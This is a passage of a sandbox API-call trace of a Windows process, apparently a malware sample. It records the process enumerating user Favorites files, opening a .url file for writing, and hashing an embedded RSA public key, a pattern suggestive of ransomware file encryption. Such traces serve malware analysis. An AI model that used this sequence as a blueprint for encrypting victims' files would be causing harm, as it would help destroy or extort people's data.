(pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\") returned="Windows Live\\" [0189.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0189.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d392e8 [0189.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.647] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\") returned="Favorites\\" [0189.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d392e8 | out: hHeap=0x6a0000) returned 1 [0189.647] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0189.647] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.647] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.647] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0189.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.648] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0189.648] PathFindFileNameW (pszPath="") returned="" [0189.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.648] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\*" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0189.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.649] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x794a9330, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79992090, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0189.650] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0189.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.650] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url") returned=".url" [0189.650] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.656] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.656] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.659] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.659] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.661] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.661] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.661] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.662] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.662] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.662] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.662] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.663] GetLastError () returned 0x0 [0189.663] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.663] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.663] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.663] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.663] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.663] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d392e8 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39330 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399d0 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.664] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a18 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39a00 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.667] GetCurrentThreadId () returned 0x264 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43e50 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.668] GetCurrentThreadId () returned 0x264 [0189.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a18 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a78 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a90 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a30 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a00 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39330 | out: hHeap=0x6a0000) returned 1 [0189.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.677] HeapFree 